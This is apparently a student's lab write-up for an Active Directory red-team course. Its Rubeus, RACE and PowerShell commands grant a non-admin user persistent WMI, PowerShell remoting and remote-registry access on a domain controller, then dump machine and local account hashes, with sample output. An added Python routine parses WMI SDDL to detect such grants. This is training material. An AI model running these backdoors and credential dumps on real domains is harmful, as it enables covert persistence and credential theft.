crtp-13

Learning Objective 13

Tasks

1 – Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

2 – Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

Flag 22 [dcorp-dc] – SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

Solutions
1 – Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

Recall that once we have administrative privileges on a machine, we can modify the security descriptors of its services (WMI, PowerShell remoting, the remote registry) so that a chosen non-admin principal can later reach those services without administrative privileges.

First of all, start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then, from that Domain Administrator shell, run the following commands with the RACE toolkit to modify the security descriptor of the WMI namespace on the DC so that student867 is granted access to WMI:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
Set-RemoteWMI -SamAccountName student867 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

Now switch to a normal (non-elevated) student867 shell and check whether we are able to execute WMI queries against the DC:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
Next, in an elevated DA shell, enable remote PowerShell access for the student with Set-RemotePSRemoting (or remove it again with -Remove).
Note: the error "The I/O operation has been aborted" is a good sign; it means the change was applied.

Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose -Remove
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student98 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\Windows\system32>

Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-dc
[dcorp-dc]: PS C:\Users\student98\Documents>


Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student867 -Verbose

2 – Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

We already injected a Silver Ticket in the previous tasks, so we can test as a normal user:

gwmi -Class win32_operatingsystem -ComputerName dcorp-dc
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -Computername dcorp-dc -Verbose
PS C:\Users\student98> gwmi -Class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

PS C:\Users\student98> . C:\AD\Tools\RACE.ps1
PS C:\Users\student98> Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
student98
PS C:\Users\student98> Get-RemoteMachineAccountHash -Computername dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     063ab4a986a9f571ffac3df4b231366a


PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-dc
[dcorp-dc]: PS C:\Users\student98\Documents>


Get-RemoteLocalAccountHash -Computername dcorp-dc -Verbose

PS C:\Users\student98> Get-RemoteLocalAccountHash -Computername dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19


ComputerName : dcorp-dc
UserName     : Administrator
UserRID      : 500
UserLMHash   : f618da2acca75dbd3afd9486927b2f05
UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c
....


Flag 22 [dcorp-dc] – SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

whoami /user

This is our SID: S-1-5-21-719815819-3726368948-3917688648-20607

The flag is the permissions string from (A;CI;Permissions String;;;SID): CCDCLXXXXXXXXXXX
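As an added, defender-side example (not part of this writeup or of the RACE toolkit), the Python below decodes a WMI namespace SDDL of the form the flag asks about, maps each ACE's rights codes to the WBEM_* permissions, and lists Allow ACEs for trustees that are not the stock namespace principals, which is how the change Set-RemoteWMI makes in task 1 would show up in an audit. The SDDL string, the stock trustee set and the domain SID inside it are constructed for the example, not taken from dcorp-dc.

```python
import re
# SDDL right codes and the bit each sets on a WMI namespace (the WBEM_* rights).
WMI_RIGHTS = {
    "CC": (0x00001, "WBEM_ENABLE"),
    "DC": (0x00002, "WBEM_METHOD_EXECUTE"),
    "LC": (0x00004, "WBEM_FULL_WRITE_REP"),
    "SW": (0x00008, "WBEM_PARTIAL_WRITE_REP"),
    "RP": (0x00010, "WBEM_WRITE_PROVIDER"),
    "WP": (0x00020, "WBEM_REMOTE_ACCESS"),
    "DT": (0x00040, "WBEM_RIGHT_SUBSCRIBE"),
    "LO": (0x00080, "WBEM_RIGHT_PUBLISH"),
    "RC": (0x20000, "READ_CONTROL"),
    "WD": (0x40000, "WRITE_DAC"),
    "WO": (0x80000, "WRITE_OWNER"),
}
STOCK_TRUSTEES = {"BA", "SY", "NS", "LS", "AU"}  # trustees normally on a namespace DACL

# Constructed sample (not captured from dcorp-dc): stock-looking ACEs plus one extra
# Allow ACE for a made-up domain user SID that grants remote WMI access.
SAMPLE_SDDL = ("O:BAG:BAD:(A;CI;CCDCRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)"
               "(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)"
               "(A;CI;CCDCWP;;;S-1-5-21-1111111111-2222222222-3333333333-1105)")

def parse_ace(body):
    """Decode one ACE body 'type;flags;rights;object;inherit_object;sid'."""
    fields = body.split(";")
    if len(fields) != 6:
        raise ValueError(f"malformed ACE: {body}")
    ace_type, flags, rights, _obj, _inh, sid = fields
    if rights.startswith("0x"):          # rights may be a raw hex mask ...
        mask = int(rights, 16)
    else:                                # ... or a run of two-letter codes
        mask = 0
        for i in range(0, len(rights), 2):
            code = rights[i:i + 2]
            if code not in WMI_RIGHTS:
                raise ValueError(f"unknown right code {code!r} in {body}")
            mask |= WMI_RIGHTS[code][0]
    names = [name for bit, name in WMI_RIGHTS.values() if mask & bit]
    return {"type": ace_type, "flags": flags, "mask": mask, "rights": names, "sid": sid}

def parse_dacl(sddl):
    """Return the DACL ACEs; 'D:' can only occur at the DACL component of an SDDL."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    return [parse_ace(b) for b in re.findall(r"\(([^)]*)\)", m.group(2) if m else "")]

def unexpected_grants(sddl, expected=STOCK_TRUSTEES):
    """Allow ACEs for trustees outside the expected set, i.e. what a Set-RemoteWMI change looks like."""
    return [a for a in parse_dacl(sddl) if a["type"] == "A" and a["sid"] not in expected]
```

On a real host the namespace SDDL to feed in can be obtained from the __SystemSecurity class's GetSD method and converted from binary with the BinarySDToSDDL method of Win32_SecurityDescriptorHelper; an ACE whose trustee is a plain domain user SID with WBEM_REMOTE_ACCESS is the thing to look for.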

Reference used: https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1
